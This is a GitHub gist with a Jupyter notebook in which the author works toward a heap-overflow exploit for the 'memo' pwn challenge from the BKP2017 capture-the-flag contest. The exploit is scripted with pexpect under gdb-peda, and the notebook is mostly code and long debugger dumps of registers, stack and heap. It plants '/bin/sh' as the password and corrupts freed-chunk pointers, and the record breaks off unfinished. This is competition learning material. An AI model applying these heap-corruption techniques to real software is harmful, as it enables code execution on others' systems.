Skip to content

Instantly share code, notes, and snippets.

@P1kachu

P1kachu/memosploit.ipynb

Last active March 6, 2017 11:02
Show Gist options
  • Save P1kachu/7fca6528b96d91895bfb5466e2f4d1b4 to your computer and use it in GitHub Desktop.
Save P1kachu/7fca6528b96d91895bfb5466e2f4d1b4 to your computer and use it in GitHub Desktop.
Download ZIP
First shot at exploiting memo (BKP2017 - pwn 300) (ipynb with gdb and py without)
Display the source blob
Display the rendered blob
Raw
memosploit.ipynb
{
"cells": [
{
"cell_type": "code",
"execution_count": 1,
"metadata": {
"collapsed": false
},
"outputs": [],
"source": [
"import pexpect\n",
"import struct\n",
"import sys"
]
},
{
"cell_type": "code",
"execution_count": 2,
"metadata": {
"collapsed": false
},
"outputs": [],
"source": [
"p = pexpect.spawn('gdb ./memo')\n",
"p.logfile = sys.stdout\n",
"p.setecho(False)\n",
"\n",
"\n",
"# malloc pointer\n",
"# | \n",
"# v\n",
"# malloc(1) = 0x603010 | 0x0 (8bytes) | 0x31 (8 bytes) | 0xDATA (32 bytes)\n",
"# malloc(2) = 0x603040 | 0x0 (8bytes) | 0x31 (8 bytes) | 0xDATA (32 bytes)\n",
"# free(2) | 0x0 (8bytes) | 0x31 (8 bytes) | 0xPREV (8 bytes) | 0xNEXT (8 bytes)\n",
"# free(1) | 0x0 (8bytes) | 0x31 (8 bytes) | 0xPREV (8 bytes) | 0xNEXT (8 bytes)\n",
"# malloc(1) = 0x603010 | 0x0 (8bytes) | 0x31 (8 bytes) | 0x424242...\n",
"# malloc(2) = 0x603040 | ...0x4242... (8 bytes) | ...0x4242... (8 bytes) | 0xDATA (32 bytes)\n",
"# malloc(0) = 0x424242.... | 0x0 (8bytes) | 0x1000 (8 bytes) | 0xDATA (LOT OF BYTES)"
]
},
{
"cell_type": "code",
"execution_count": 3,
"metadata": {
"collapsed": false
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"GNU gdb (GDB) 7.12\n",
"Copyright (C) 2016 Free Software Foundation, Inc.\n",
"License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\n",
"This is free software: you are free to change and redistribute it.\n",
"There is NO WARRANTY, to the extent permitted by law. Type \"show copying\"\n",
"and \"show warranty\" for details.\n",
"This GDB was configured as \"x86_64-pc-linux-gnu\".\n",
"Type \"show configuration\" for configuration details.\n",
"For bug reporting instructions, please see:\n",
"<http://www.gnu.org/software/gdb/bugs/>.\n",
"Find the GDB manual and other documentation resources online at:\n",
"<http://www.gnu.org/software/gdb/documentation/>.\n",
"For help, type \"help\".\n",
"Type \"apropos word\" to search for commands related to \"word\"...\n",
"Reading symbols from ./memo...(no debugging symbols found)...done.\n",
"\u001b[;31mgdb-peda$ \u001b[0mb *0x400f1b\n",
"b *0x400d7b\n",
"Breakpoint 1 at 0x400f1b\n",
"\u001b[;31mgdb-peda$ \u001b[0mBreakpoint 2 at 0x400d7b\n",
"\u001b[;31mgdb-peda$ \u001b[0mb *0x400d85\n",
"r\n",
"Breakpoint 3 at 0x400d85\n",
"\u001b[;31mgdb-peda$ \u001b[0mStarting program: /home/p1kachu/Dropbox/TMP/bkp/memo \n",
"What's user name: P1kachu\n"
]
},
{
"data": {
"text/plain": [
"8"
]
},
"execution_count": 3,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"p.expect(\"done.\")\n",
"p.sendline('b *0x400f1b')\n",
"p.expect(\"peda\\$\")\n",
"p.sendline('b *0x400d7b')\n",
"p.expect(\"peda\\$\")\n",
"p.sendline('b *0x400d85')\n",
"p.expect(\"peda\\$\")\n",
"#p.sendline('python from libheap import *')\n",
"#p.expect(\"peda\\$\")\n",
"p.sendline('r')\n",
"p.expect(\"What's user name:\")\n",
"p.sendline(\"P1kachu\")"
]
},
{
"cell_type": "code",
"execution_count": 4,
"metadata": {
"collapsed": false
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"Do you wanna set password? (y/n) y\n"
]
},
{
"data": {
"text/plain": [
"2"
]
},
"execution_count": 4,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"p.expect(\"Do you wanna set password\\? \\(y/n\\)\")\n",
"p.sendline(\"y\")"
]
},
{
"cell_type": "code",
"execution_count": 5,
"metadata": {
"collapsed": false
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"Password must be set to 32 digits or less.\n",
"Password: /bin/sh\n",
"Done! have a good day P1kachu\n",
"\n",
"1. Leave message on memo\n",
"2. Edit message last memo\n",
"3. View memo\n",
"4. Delete memo\n",
"5. Change password\n",
"6. Quit.\n",
">> "
]
},
{
"data": {
"text/plain": [
"0"
]
},
"execution_count": 5,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"p.expect(\"Password: \")\n",
"p.sendline(\"/bin/sh\")\n",
"p.expect(\">> \")"
]
},
{
"cell_type": "code",
"execution_count": 6,
"metadata": {
"collapsed": false
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"1\n",
"Index: 1\n",
"Length: 31\n",
"Message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n",
"\n",
"1. Leave message on memo\n",
"2. Edit message last memo\n",
"3. View memo\n",
"4. Delete memo\n",
"5. Change password\n",
"6. Quit.\n",
">> Invalid choice\n",
"1. Leave message on memo\n",
"2. Edit message last memo\n",
"3. View memo\n",
"4. Delete memo\n",
"5. Change password\n",
"6. Quit.\n",
">> 1\n",
"Index: 2\n",
"Length: 31\n",
"Message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n",
"\n",
"1. Leave message on memo\n",
"2. Edit message last memo\n",
"3. View memo\n",
"4. Delete memo\n",
"5. Change password\n",
"6. Quit.\n",
">> Invalid choice\n",
"1. Leave message on memo\n",
"2. Edit message last memo\n",
"3. View memo\n",
"4. Delete memo\n",
"5. Change password\n",
"6. Quit.\n",
">> "
]
},
{
"data": {
"text/plain": [
"0"
]
},
"execution_count": 6,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"SIZE=31\n",
"\n",
"# alloc(1)\n",
"p.sendline(\"1\")\n",
"p.expect(\"Index: \")\n",
"p.sendline(\"1\")\n",
"p.expect(\"Length: \")\n",
"p.sendline(str(SIZE))\n",
"p.expect(\"Message: \")\n",
"p.sendline(SIZE * 'A')\n",
"p.expect(\">> \")\n",
"\n",
"\n",
"# alloc(2)\n",
"p.sendline('1')\n",
"p.expect(\"Index: \")\n",
"p.sendline(\"2\")\n",
"p.expect(\"Length: \")\n",
"p.sendline(str(SIZE))\n",
"p.expect(\"Message: \")\n",
"p.sendline(SIZE * 'A')\n",
"p.expect(\">> \")\n"
]
},
{
"cell_type": "code",
"execution_count": 7,
"metadata": {
"collapsed": false
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"4\n",
"Index: 2\n",
"\u001b[;36m[----------------------------------registers-----------------------------------]\u001b[0m\n",
"\u001b[m\u001b[;32mRAX\u001b[0m: 0x0 \n",
"\u001b[;32mRBX\u001b[0m: 0x0 \n",
"\u001b[;32mRCX\u001b[0m: 0x0 \n",
"\u001b[;32mRDX\u001b[0m: 0xffffffff \n",
"\u001b[;32mRSI\u001b[0m: 0x0 \n",
"\u001b[;32mRDI\u001b[0m: \u001b[;36m0x7ffff7dd4af0\u001b[0m --> \u001b[;36m0x603030\u001b[0m --> 0x0 \n",
"\u001b[;32mRBP\u001b[0m: \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\n",
"\u001b[;32mRSP\u001b[0m: \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\n",
"\u001b[;32mRIP\u001b[0m: \u001b[;31m0x400f1b\u001b[0m (mov rax,QWORD PTR [rip+0x201ade] # 0x602a00)\n",
"\u001b[;32mR8 \u001b[0m: \u001b[;36m0x603040\u001b[0m --> 0x0 \n",
"\u001b[;32mR9 \u001b[0m: 0x0 \n",
"\u001b[;32mR10\u001b[0m: 0x0 \n",
"\u001b[;32mR11\u001b[0m: \u001b[;32m0x7ffff7b87780\u001b[0m --> 0x100000000 \n",
"\u001b[;32mR12\u001b[0m: \u001b[;31m0x4008a0\u001b[0m (xor ebp,ebp)\n",
"\u001b[;32mR13\u001b[0m: \u001b[;36m0x7fffffffe0d0\u001b[0m --> 0x1 \n",
"\u001b[;32mR14\u001b[0m: 0x0 \n",
"\u001b[;32mR15\u001b[0m: 0x0\u001b[0m\n",
"\u001b[m\u001b[;32mEFLAGS\u001b[0m: 0x206 (\u001b[;32mcarry\u001b[0m \u001b[;1;31mPARITY\u001b[0m \u001b[;32madjust\u001b[0m \u001b[;32mzero\u001b[0m \u001b[;32msign\u001b[0m \u001b[;32mtrap\u001b[0m \u001b[;1;31mINTERRUPT\u001b[0m \u001b[;32mdirection\u001b[0m \u001b[;32moverflow\u001b[0m)\u001b[0m\n",
"\u001b[m\u001b[;36m[-------------------------------------code-------------------------------------]\u001b[0m\u001b[0m\n",
"\u001b[m 0x400f10:\u001b[;2m\tmov rax,QWORD PTR [rax]\u001b[0m\n",
" 0x400f13:\u001b[;2m\tmov rdi,rax\u001b[0m\n",
" 0x400f16:\u001b[;2;32m\tcall 0x400810\u001b[0m\n",
"=> 0x400f1b:\u001b[;1;32m\tmov rax,QWORD PTR [rip+0x201ade] # 0x602a00\u001b[0m\n",
" 0x400f22:\u001b[m\tshl rax,0x3\u001b[0m\n",
" 0x400f26:\u001b[m\tadd rax,0x602a70\u001b[0m\n",
" 0x400f2c:\u001b[m\tmov QWORD PTR [rax],0x0\u001b[0m\n",
" 0x400f33:\u001b[m\tmov edi,0x40141c\u001b[0m\u001b[0m\n",
"\u001b[m\u001b[;36m[------------------------------------stack-------------------------------------]\u001b[0m\u001b[0m\n",
"\u001b[m0000| \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\u001b[0m\n",
"\u001b[m0008| \u001b[;36m0x7fffffffdfb8\u001b[0m --> \u001b[;31m0x4011ce\u001b[0m (jmp 0x4011f7)\u001b[0m\n",
"\u001b[m0016| \u001b[;36m0x7fffffffdfc0\u001b[0m --> 0x0 \u001b[0m\n",
"\u001b[m0024| \u001b[;36m0x7fffffffdfc8\u001b[0m --> \u001b[;36m0x7fffffffe0e8\u001b[0m --> \u001b[;36m0x7fffffffe43f\u001b[0m (\"LS_COLORS=rs=0:di=01;33:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc\"...)\u001b[0m\n",
"\u001b[m0032| \u001b[;36m0x7fffffffdfd0\u001b[0m --> \u001b[;36m0x7fffffffe0d8\u001b[0m --> \u001b[;36m0x7fffffffe41c\u001b[0m (\"/home/p1kachu/Dropbox/TMP/bkp/memo\")\u001b[0m\n",
"\u001b[m0040| \u001b[;36m0x7fffffffdfd8\u001b[0m --> 0x1004008a0 \u001b[0m\n",
"\u001b[m0048| \u001b[;36m0x7fffffffdfe0\u001b[0m --> \u001b[;36m0x7fffffffe0d0\u001b[0m --> 0x1 \u001b[0m\n",
"\u001b[m0056| \u001b[;36m0x7fffffffdfe8\u001b[0m --> 0x400000000 \u001b[0m\n",
"\u001b[;36m[------------------------------------------------------------------------------]\u001b[0m\n",
"\u001b[mLegend: \u001b[;31mcode\u001b[0m, \u001b[;36mdata\u001b[0m, \u001b[;32mrodata\u001b[0m, value\u001b[0m\n",
"\n",
"Breakpoint 1, 0x0000000000400f1b in ?? ()\n",
"\u001b[;31mgdb-peda$ \u001b[0mc\n",
"Continuing.\n",
"Deleted!\n",
"\n",
"1. Leave message on memo\n",
"2. Edit message last memo\n",
"3. View memo\n",
"4. Delete memo\n",
"5. Change password\n",
"6. Quit.\n",
">> 4\n",
"Index: 1\n",
"\u001b[;36m[----------------------------------registers-----------------------------------]\u001b[0m\n",
"\u001b[m\u001b[;32mRAX\u001b[0m: \u001b[;36m0x603030\u001b[0m --> 0x0 \n",
"\u001b[;32mRBX\u001b[0m: 0x0 \n",
"\u001b[;32mRCX\u001b[0m: \u001b[;36m0x603030\u001b[0m --> 0x0 \n",
"\u001b[;32mRDX\u001b[0m: 0xffffffff \n",
"\u001b[;32mRSI\u001b[0m: 0x0 \n",
"\u001b[;32mRDI\u001b[0m: \u001b[;36m0x7ffff7dd4af0\u001b[0m --> \u001b[;36m0x603000\u001b[0m --> 0x0 \n",
"\u001b[;32mRBP\u001b[0m: \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\n",
"\u001b[;32mRSP\u001b[0m: \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\n",
"\u001b[;32mRIP\u001b[0m: \u001b[;31m0x400f1b\u001b[0m (mov rax,QWORD PTR [rip+0x201ade] # 0x602a00)\n",
"\u001b[;32mR8 \u001b[0m: \u001b[;36m0x603010\u001b[0m --> \u001b[;36m0x603030\u001b[0m --> 0x0 \n",
"\u001b[;32mR9 \u001b[0m: 0x0 \n",
"\u001b[;32mR10\u001b[0m: 0x0 \n",
"\u001b[;32mR11\u001b[0m: \u001b[;32m0x7ffff7b87780\u001b[0m --> 0x100000000 \n",
"\u001b[;32mR12\u001b[0m: \u001b[;31m0x4008a0\u001b[0m (xor ebp,ebp)\n",
"\u001b[;32mR13\u001b[0m: \u001b[;36m0x7fffffffe0d0\u001b[0m --> 0x1 \n",
"\u001b[;32mR14\u001b[0m: 0x0 \n",
"\u001b[;32mR15\u001b[0m: 0x0\u001b[0m\n",
"\u001b[m\u001b[;32mEFLAGS\u001b[0m: 0x206 (\u001b[;32mcarry\u001b[0m \u001b[;1;31mPARITY\u001b[0m \u001b[;32madjust\u001b[0m \u001b[;32mzero\u001b[0m \u001b[;32msign\u001b[0m \u001b[;32mtrap\u001b[0m \u001b[;1;31mINTERRUPT\u001b[0m \u001b[;32mdirection\u001b[0m \u001b[;32moverflow\u001b[0m)\u001b[0m\n",
"\u001b[m\u001b[;36m[-------------------------------------code-------------------------------------]\u001b[0m\u001b[0m\n",
"\u001b[m 0x400f10:\u001b[;2m\tmov rax,QWORD PTR [rax]\u001b[0m\n",
" 0x400f13:\u001b[;2m\tmov rdi,rax\u001b[0m\n",
" 0x400f16:\u001b[;2;32m\tcall 0x400810\u001b[0m\n",
"=> 0x400f1b:\u001b[;1;32m\tmov rax,QWORD PTR [rip+0x201ade] # 0x602a00\u001b[0m\n",
" 0x400f22:\u001b[m\tshl rax,0x3\u001b[0m\n",
" 0x400f26:\u001b[m\tadd rax,0x602a70\u001b[0m\n",
" 0x400f2c:\u001b[m\tmov QWORD PTR [rax],0x0\u001b[0m\n",
" 0x400f33:\u001b[m\tmov edi,0x40141c\u001b[0m\u001b[0m\n",
"\u001b[m\u001b[;36m[------------------------------------stack-------------------------------------]\u001b[0m\u001b[0m\n",
"\u001b[m0000| \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\u001b[0m\n",
"\u001b[m0008| \u001b[;36m0x7fffffffdfb8\u001b[0m --> \u001b[;31m0x4011ce\u001b[0m (jmp 0x4011f7)\u001b[0m\n",
"\u001b[m0016| \u001b[;36m0x7fffffffdfc0\u001b[0m --> 0x0 \u001b[0m\n",
"\u001b[m0024| \u001b[;36m0x7fffffffdfc8\u001b[0m --> \u001b[;36m0x7fffffffe0e8\u001b[0m --> \u001b[;36m0x7fffffffe43f\u001b[0m (\"LS_COLORS=rs=0:di=01;33:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc\"...)\u001b[0m\n",
"\u001b[m0032| \u001b[;36m0x7fffffffdfd0\u001b[0m --> \u001b[;36m0x7fffffffe0d8\u001b[0m --> \u001b[;36m0x7fffffffe41c\u001b[0m (\"/home/p1kachu/Dropbox/TMP/bkp/memo\")\u001b[0m\n",
"\u001b[m0040| \u001b[;36m0x7fffffffdfd8\u001b[0m --> 0x1004008a0 \u001b[0m\n",
"\u001b[m0048| \u001b[;36m0x7fffffffdfe0\u001b[0m --> \u001b[;36m0x7fffffffe0d0\u001b[0m --> 0x1 \u001b[0m\n",
"\u001b[m0056| \u001b[;36m0x7fffffffdfe8\u001b[0m --> 0x400000000 \u001b[0m\n",
"\u001b[;36m[------------------------------------------------------------------------------]\u001b[0m\n",
"\u001b[mLegend: \u001b[;31mcode\u001b[0m, \u001b[;36mdata\u001b[0m, \u001b[;32mrodata\u001b[0m, value\u001b[0m\n",
"\n",
"Breakpoint 1, 0x0000000000400f1b in ?? ()\n",
"\u001b[;31mgdb-peda$ \u001b[0mx/4xw 0x603030\n",
"0x603030:\t0x00000000\t0x00000000\t0x00000031\t0x00000000\n",
"\u001b[;31mgdb-peda$ \u001b[0mc\n",
"Continuing.\n",
"Deleted!\n",
"\n",
"1. Leave message on memo\n",
"2. Edit message last memo\n",
"3. View memo\n",
"4. Delete memo\n",
"5. Change password\n",
"6. Quit.\n",
">> c\n"
]
},
{
"data": {
"text/plain": [
"0"
]
},
"execution_count": 7,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"\n",
"# free(2)\n",
"p.sendline('4')\n",
"p.expect(\"Index: \")\n",
"p.sendline(\"2\")\n",
"\n",
"p.expect(\"peda\\$\")\n",
"#p.sendline(\"heap -f\")\n",
"#p.readline()\n",
"p.sendline(\"c\")\n",
"\n",
"p.expect(\">> \")\n",
"\n",
"# free(1)\n",
"p.sendline('4')\n",
"p.expect(\"Index: \")\n",
"p.sendline(\"1\")\n",
"\n",
"p.expect(\"peda\\$\")\n",
"p.sendline(\"x/4xw 0x603030\")\n",
"p.readline()\n",
"p.sendline(\"c\")\n",
"p.readline()\n",
"p.sendline(\"c\")\n",
"\n",
"p.expect(\">> \")\n"
]
},
{
"cell_type": "code",
"execution_count": 8,
"metadata": {
"collapsed": false
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"(' \\x00\\x00\\x00\\x00\\x00\\x00\\x00', '`0`\\x00\\x00\\x00\\x00\\x00', '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00')\n",
"1\n",
"Invalid choice\n",
"1. Leave message on memo\n",
"2. Edit message last memo\n",
"3. View memo\n",
"4. Delete memo\n",
"5. Change password\n",
"6. Quit.\n",
">> Index: 1\n",
"Length: 96\n",
"message too long, you can leave on memo though\n",
"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000 \u0000\u0000\u0000\u0000\u0000\u0000\u0000`0`\u0000\u0000\u0000\u0000\u0000\n",
"--->57\n",
"\u001b[;36m[----------------------------------registers-----------------------------------]\u001b[0m\n",
"\u001b[m\u001b[;32mRAX\u001b[0m: 0x39 ('9')\n",
"\u001b[;32mRBX\u001b[0m: 0x0 \n",
"\u001b[;32mRCX\u001b[0m: \u001b[;31m0x7ffff7b174d0\u001b[0m (<__read_nocancel+7>:\tcmp rax,0xfffffffffffff001)\n",
"\u001b[;32mRDX\u001b[0m: 0x60 ('`')\n",
"\u001b[;32mRSI\u001b[0m: \u001b[;36m0x603010\u001b[0m ('D' <repeats 32 times>)\n",
"\u001b[;32mRDI\u001b[0m: 0x0 \n",
"\u001b[;32mRBP\u001b[0m: \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\n",
"\u001b[;32mRSP\u001b[0m: \u001b[;36m0x7fffffffdfa0\u001b[0m --> \u001b[;36m0x603010\u001b[0m ('D' <repeats 32 times>)\n",
"\u001b[;32mRIP\u001b[0m: \u001b[;31m0x400d7b\u001b[0m (mov eax,0x0)\n",
"\u001b[;32mR8 \u001b[0m: \u001b[;36m0x7ffff7fc8400\u001b[0m (0x00007ffff7fc8400)\n",
"\u001b[;32mR9 \u001b[0m: 0x30 ('0')\n",
"\u001b[;32mR10\u001b[0m: 0x0 \n",
"\u001b[;32mR11\u001b[0m: 0x246 \n",
"\u001b[;32mR12\u001b[0m: \u001b[;31m0x4008a0\u001b[0m (xor ebp,ebp)\n",
"\u001b[;32mR13\u001b[0m: \u001b[;36m0x7fffffffe0d0\u001b[0m --> 0x1 \n",
"\u001b[;32mR14\u001b[0m: 0x0 \n",
"\u001b[;32mR15\u001b[0m: 0x0\u001b[0m\n",
"\u001b[m\u001b[;32mEFLAGS\u001b[0m: 0x203 (\u001b[;1;31mCARRY\u001b[0m \u001b[;32mparity\u001b[0m \u001b[;32madjust\u001b[0m \u001b[;32mzero\u001b[0m \u001b[;32msign\u001b[0m \u001b[;32mtrap\u001b[0m \u001b[;1;31mINTERRUPT\u001b[0m \u001b[;32mdirection\u001b[0m \u001b[;32moverflow\u001b[0m)\u001b[0m\n",
"\u001b[m\u001b[;36m[-------------------------------------code-------------------------------------]\u001b[0m\u001b[0m\n",
"\u001b[m 0x400d6e:\u001b[;2m\tmov rsi,rax\u001b[0m\n",
" 0x400d71:\u001b[;2m\tmov edi,0x0\u001b[0m\n",
" 0x400d76:\u001b[;2;32m\tcall 0x400840\u001b[0m\n",
"=> 0x400d7b:\u001b[;1;32m\tmov eax,0x0\u001b[0m\n",
" 0x400d80:\u001b[;32m\tcall 0x4009d9\u001b[0m\n",
" 0x400d85:\u001b[;33m\tjmp 0x400da5\u001b[0m\n",
" 0x400d87:\u001b[m\tmov edi,0x40137f\u001b[0m\n",
" 0x400d8c:\u001b[;32m\tcall 0x400818\u001b[0m\u001b[0m\n",
"\u001b[m\u001b[;36m[------------------------------------stack-------------------------------------]\u001b[0m\u001b[0m\n",
"\u001b[m0000| \u001b[;36m0x7fffffffdfa0\u001b[0m --> \u001b[;36m0x603010\u001b[0m ('D' <repeats 32 times>)\u001b[0m\n",
"\u001b[m0008| \u001b[;36m0x7fffffffdfa8\u001b[0m --> 0x60 ('`')\u001b[0m\n",
"\u001b[m0016| \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\u001b[0m\n",
"\u001b[m0024| \u001b[;36m0x7fffffffdfb8\u001b[0m --> \u001b[;31m0x4011aa\u001b[0m (jmp 0x4011f7)\u001b[0m\n",
"\u001b[m0032| \u001b[;36m0x7fffffffdfc0\u001b[0m --> 0x0 \u001b[0m\n",
"\u001b[m0040| \u001b[;36m0x7fffffffdfc8\u001b[0m --> \u001b[;36m0x7fffffffe0e8\u001b[0m --> \u001b[;36m0x7fffffffe43f\u001b[0m (\"LS_COLORS=rs=0:di=01;33:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc\"...)\u001b[0m\n",
"\u001b[m0048| \u001b[;36m0x7fffffffdfd0\u001b[0m --> \u001b[;36m0x7fffffffe0d8\u001b[0m --> \u001b[;36m0x7fffffffe41c\u001b[0m (\"/home/p1kachu/Dropbox/TMP/bkp/memo\")\u001b[0m\n",
"\u001b[m0056| \u001b[;36m0x7fffffffdfd8\u001b[0m --> 0x1004008a0 \u001b[0m\n",
"\u001b[;36m[------------------------------------------------------------------------------]\u001b[0m\n",
"\u001b[mLegend: \u001b[;31mcode\u001b[0m, \u001b[;36mdata\u001b[0m, \u001b[;32mrodata\u001b[0m, value\u001b[0m\n",
"\n",
"Breakpoint 2, 0x0000000000400d7b in ?? ()\n",
"\u001b[;31mgdb-peda$ \u001b[0mx/8xw 0x603030\n",
"0x603030:\t0x00000000\t0x00000000\t0x00000020\t0x00000000\n",
"c\n",
"0x603040:\t0x00603060\t0x00000000\t0x4141410a\t0x41414141\n",
"\u001b[;31mgdb-peda$ \u001b[0mContinuing.\n",
"python from libheap import *\n",
"heap -f\n",
"c\n",
"\n",
"\u001b[;36m[----------------------------------registers-----------------------------------]\u001b[0m\n",
"\u001b[m\u001b[;32mRAX\u001b[0m: 0x1 \n",
"\u001b[;32mRBX\u001b[0m: 0x0 \n",
"\u001b[;32mRCX\u001b[0m: \u001b[;31m0x7ffff7b17530\u001b[0m (<__write_nocancel+7>:\tcmp rax,0xfffffffffffff001)\n",
"\u001b[;32mRDX\u001b[0m: \u001b[;36m0x7ffff7dd6740\u001b[0m --> 0x0 \n",
"\u001b[;32mRSI\u001b[0m: \u001b[;36m0x7ffff7dd5663\u001b[0m --> 0xdd6740000000000a \n",
"\u001b[;32mRDI\u001b[0m: 0x0 \n",
"\u001b[;32mRBP\u001b[0m: \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\n",
"\u001b[;32mRSP\u001b[0m: \u001b[;36m0x7fffffffdfa0\u001b[0m --> \u001b[;36m0x603010\u001b[0m ('D' <repeats 32 times>)\n",
"\u001b[;32mRIP\u001b[0m: \u001b[;31m0x400d85\u001b[0m (jmp 0x400da5)\n",
"\u001b[;32mR8 \u001b[0m: \u001b[;36m0x7ffff7fc8400\u001b[0m (0x00007ffff7fc8400)\n",
"\u001b[;32mR9 \u001b[0m: 0x30 ('0')\n",
"\u001b[;32mR10\u001b[0m: 0x0 \n",
"\u001b[;32mR11\u001b[0m: 0x246 \n",
"\u001b[;32mR12\u001b[0m: \u001b[;31m0x4008a0\u001b[0m (xor ebp,ebp)\n",
"\u001b[;32mR13\u001b[0m: \u001b[;36m0x7fffffffe0d0\u001b[0m --> 0x1 \n",
"\u001b[;32mR14\u001b[0m: 0x0 \n",
"\u001b[;32mR15\u001b[0m: 0x0\u001b[0m\n",
"\u001b[m\u001b[;32mEFLAGS\u001b[0m: 0x202 (\u001b[;32mcarry\u001b[0m \u001b[;32mparity\u001b[0m \u001b[;32madjust\u001b[0m \u001b[;32mzero\u001b[0m \u001b[;32msign\u001b[0m \u001b[;32mtrap\u001b[0m \u001b[;1;31mINTERRUPT\u001b[0m \u001b[;32mdirection\u001b[0m \u001b[;32moverflow\u001b[0m)\u001b[0m\n",
"\u001b[m\u001b[;36m[-------------------------------------code-------------------------------------]\u001b[0m\u001b[0m\n",
"\u001b[m 0x400d76:\u001b[;2;32m\tcall 0x400840\u001b[0m\n",
" 0x400d7b:\u001b[;2m\tmov eax,0x0\u001b[0m\n",
" 0x400d80:\u001b[;2;32m\tcall 0x4009d9\u001b[0m\n",
"=> 0x400d85:\u001b[;1;32m\tjmp 0x400da5\u001b[0m\n",
" | 0x400d87:\u001b[m\tmov edi,0x40137f\u001b[0m\n",
" | 0x400d8c:\u001b[;32m\tcall 0x400818\u001b[0m\n",
" | 0x400d91:\u001b[m\tmov edi,0x1\u001b[0m\n",
" | 0x400d96:\u001b[;32m\tcall 0x400890\u001b[0m\n",
" |->\u001b[;31m 0x400da5:\tnop\u001b[0m\n",
" 0x400da6:\tleave\n",
" 0x400da7:\tret\n",
" 0x400da8:\tpush rbp\n",
"\u001b[;31m JUMP is taken\u001b[0m\u001b[0m\n",
"\u001b[m\u001b[;36m[------------------------------------stack-------------------------------------]\u001b[0m\u001b[0m\n",
"\u001b[m0000| \u001b[;36m0x7fffffffdfa0\u001b[0m --> \u001b[;36m0x603010\u001b[0m ('D' <repeats 32 times>)\u001b[0m\n",
"\u001b[m0008| \u001b[;36m0x7fffffffdfa8\u001b[0m --> 0x60 ('`')\u001b[0m\n",
"\u001b[m0016| \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\u001b[0m\n",
"\u001b[m0024| \u001b[;36m0x7fffffffdfb8\u001b[0m --> \u001b[;31m0x4011aa\u001b[0m (jmp 0x4011f7)\u001b[0m\n",
"\u001b[m0032| \u001b[;36m0x7fffffffdfc0\u001b[0m --> 0x0 \u001b[0m\n",
"\u001b[m0040| \u001b[;36m0x7fffffffdfc8\u001b[0m --> \u001b[;36m0x7fffffffe0e8\u001b[0m --> \u001b[;36m0x7fffffffe43f\u001b[0m (\"LS_COLORS=rs=0:di=01;33:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc\"...)\u001b[0m\n",
"\u001b[m0048| \u001b[;36m0x7fffffffdfd0\u001b[0m --> \u001b[;36m0x7fffffffe0d8\u001b[0m --> \u001b[;36m0x7fffffffe41c\u001b[0m (\"/home/p1kachu/Dropbox/TMP/bkp/memo\")\u001b[0m\n",
"\u001b[m0056| \u001b[;36m0x7fffffffdfd8\u001b[0m --> 0x1004008a0 \u001b[0m\n",
"\u001b[;36m[------------------------------------------------------------------------------]\u001b[0m\n",
"\u001b[mLegend: \u001b[;31mcode\u001b[0m, \u001b[;36mdata\u001b[0m, \u001b[;32mrodata\u001b[0m, value\u001b[0m\n",
"\n",
